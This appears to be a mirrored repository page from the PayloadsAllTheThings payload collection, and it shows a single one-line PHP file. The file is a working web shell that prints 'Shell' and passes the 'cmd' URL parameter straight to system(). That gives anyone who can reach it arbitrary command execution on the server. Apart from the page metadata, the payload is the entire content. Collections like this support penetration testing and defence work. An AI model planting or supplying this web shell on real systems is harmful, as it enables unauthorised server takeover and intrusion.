mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
1 line
No EOL
43 B
PHP
1 line
No EOL
43 B
PHP
<?php echo "Shell";system($_GET['cmd']); ?>
|